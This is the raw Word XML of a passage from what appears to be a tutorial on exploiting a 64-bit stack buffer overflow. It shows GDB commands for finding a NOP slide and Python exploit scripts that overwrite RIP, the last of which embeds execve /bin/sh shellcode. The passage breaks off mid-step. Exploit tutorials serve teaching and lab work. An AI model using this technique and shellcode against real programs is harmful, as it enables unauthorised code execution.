          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C38E024" w14:textId="67627619" w:rsidR="00842A44" w:rsidRDefault="00842A44" w:rsidP="00B2677C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00842A44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>It tells us that the last element in the stack is at location 264, which means that the next six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842A44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>characters should overflow the RIP register:</w:t>
      </w:r>
      <w:r w:rsidRPr="00842A44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>#!/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00842A44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00842A44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/bin/python</w:t>
      </w:r>
      <w:r w:rsidRPr="00842A44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>from struct import *</w:t>
      </w:r>
      <w:r w:rsidRPr="00842A44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>buffer = ''</w:t>
      </w:r>
      <w:r w:rsidRPr="00842A44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>buffer += 'A'*264</w:t>
      </w:r>
      <w:r w:rsidRPr="00842A44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>buffer += pack("&lt;Q", 0x424242424242)</w:t>
      </w:r>
      <w:r w:rsidRPr="00842A44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>f = open("input.txt", "w")</w:t>
      </w:r>
      <w:r w:rsidRPr="00842A44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00842A44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>f.write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00842A44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(buffer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47598D53" w14:textId="518F86BD" w:rsidR="00693CAD" w:rsidRDefault="00693CAD" w:rsidP="00B2677C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A30D57C" w14:textId="75E9F779" w:rsidR="00693CAD" w:rsidRDefault="00693CAD" w:rsidP="00693CAD">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00693CAD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Injecting shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC7D6F1" w14:textId="1595BEEC" w:rsidR="00693CAD" w:rsidRDefault="00693CAD" w:rsidP="00693CAD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00693CAD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>We need to find a way to inject a shellcode in the As so we can jump to it easily. To do so, we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93CAD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>need to first inject 0x90 or the NOP instruction, which is NOP, just to make sure that our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93CAD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>shellcode is injected correctly. After injecting our shellcode, we change the instruction pointer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93CAD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(RIP) to any address in the memory containing the NOP instruction (0x90)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCA1B7C" w14:textId="6DFCF693" w:rsidR="00693CAD" w:rsidRDefault="00693CAD" w:rsidP="00693CAD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00693CAD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Then the execution should just pass on all </w:t>
      </w:r>
      <w:r w:rsidRPr="00693CAD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">NOP </w:t>
      </w:r>
      <w:r w:rsidRPr="00693CAD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">instructions until it hits the </w:t>
      </w:r>
      <w:r w:rsidRPr="00693CAD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Shellcode</w:t>
      </w:r>
      <w:r w:rsidRPr="00693CAD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, and it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93CAD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>will start executing it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8C5054" w14:textId="1AA105DA" w:rsidR="00A9280B" w:rsidRDefault="00A9280B" w:rsidP="00693CAD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="606F0824" wp14:editId="1F805DF3">
            <wp:extent cx="3438525" cy="561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61E" w14:textId="0C5287E1" w:rsidR="00A9280B" w:rsidRDefault="00A9280B" w:rsidP="00693CAD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A9280B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This is what our exploit should look like. Let's try to inject the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A9280B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>execve</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A9280B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> /bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A9280B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A9280B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> shellcode (length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A9280B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>32). Now we need to get any address in the memory that contains 0x90:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A9280B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>#!/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A9280B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A9280B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/bin/python</w:t>
      </w:r>
      <w:r w:rsidRPr="00A9280B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>from struct import *</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="00A9280B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00A9280B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>buffer = ''</w:t>
      </w:r>
      <w:r w:rsidRPr="00A9280B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>buffer += '\x90'*232</w:t>
      </w:r>
      <w:r w:rsidRPr="00A9280B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>buffer += 'C'*32</w:t>
      </w:r>
      <w:r w:rsidRPr="00A9280B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>buffer += pack("&lt;Q", 0x424242424242)</w:t>
      </w:r>
      <w:r w:rsidRPr="00A9280B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>f = open("input.txt", "w")</w:t>
      </w:r>
      <w:r w:rsidRPr="00A9280B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A9280B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>f.write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A9280B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(buffer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553386B3" w14:textId="34C35134" w:rsidR="00A9280B" w:rsidRDefault="00A9280B" w:rsidP="00693CAD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="440EF901" w14:textId="500463BB" w:rsidR="00A9280B" w:rsidRDefault="00A9280B" w:rsidP="00693CAD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A9280B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Let's run the new exploit:</w:t>
      </w:r>
      <w:r w:rsidR="003E1763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A9280B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$./</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A9280B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exploit.py</w:t>
      </w:r>
      <w:r w:rsidRPr="00A9280B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00A9280B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Then, from inside GDB, run the following command:</w:t>
      </w:r>
      <w:r w:rsidR="003E1763">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A9280B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$ run $(cat input.txt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5372E8AE" w14:textId="61902C42" w:rsidR="003E1763" w:rsidRDefault="003E1763" w:rsidP="00693CAD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E1763">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The program stopped. Now, let's look inside the stack to search for our NOP slide by printing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3E1763">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>200 hex values from the memory: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3E1763">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$ x/200x $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003E1763">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rsp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="72FECA26" w14:textId="4B2F56A5" w:rsidR="003E1763" w:rsidRDefault="003E1763" w:rsidP="00693CAD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E50AFE5" wp14:editId="5E2EF9BB">
            <wp:extent cx="5400040" cy="4600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DE5E" w14:textId="0D8C34C1" w:rsidR="003E1763" w:rsidRDefault="003E1763" w:rsidP="00693CAD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56D093D9" w14:textId="3B32E3FF" w:rsidR="003E1763" w:rsidRDefault="003E1763" w:rsidP="00693CAD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E1763">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>We got them! These are our NOP's instructions that we injected. Also, after the NOPs, you can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3E1763">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>see 32 Cs (43), so now we can choose any address in the middle of this NOP's instructions; let's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3E1763">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>select 0x7fffffffe2c0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A617D10" w14:textId="5B39F3F4" w:rsidR="003E1763" w:rsidRDefault="003E1763" w:rsidP="00693CAD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D580D0C" wp14:editId="200AD92A">
            <wp:extent cx="4019550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AD5B" w14:textId="2D7244ED" w:rsidR="003E1763" w:rsidRDefault="003E1763" w:rsidP="00693CAD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E1763">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>This is what the final payload should look like:</w:t>
      </w:r>
      <w:r w:rsidRPr="003E1763">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>#!/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003E1763">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003E1763">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/bin/python</w:t>
      </w:r>
      <w:r w:rsidRPr="003E1763">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>from struct import *</w:t>
      </w:r>
      <w:r w:rsidRPr="003E1763">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>buffer = ''</w:t>
      </w:r>
      <w:r w:rsidRPr="003E1763">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>buffer += '\x90'*232</w:t>
      </w:r>
      <w:r w:rsidRPr="003E1763">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>buffer += '\x48\x31\xc0\x50\x48\x89\xe2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x48\x89\xe7\x50\x</w:t>
      </w:r>
      <w:r w:rsidRPr="003E1763">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>buffer += pack("&lt;Q", 0x7fffffffe2c0)</w:t>
      </w:r>
      <w:r w:rsidRPr="003E1763">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>f = open("input.txt", "w")</w:t>
      </w:r>
      <w:r w:rsidRPr="003E1763">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003E1763">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>f.write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003E1763">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(buffer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CAF8C4" w14:textId="6CB6214F" w:rsidR="003E1763" w:rsidRDefault="003E1763" w:rsidP="00693CAD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2228D70D" w14:textId="591319F2" w:rsidR="003E1763" w:rsidRDefault="003E1763" w:rsidP="00693CAD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E1763">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Let's run the exploit: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3E1763">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$ .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003E1763">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/exploit.py</w:t>
      </w:r>
      <w:r w:rsidRPr="003E1763">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003E1763">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Then, from inside GDB, run the following command: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3E1763">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
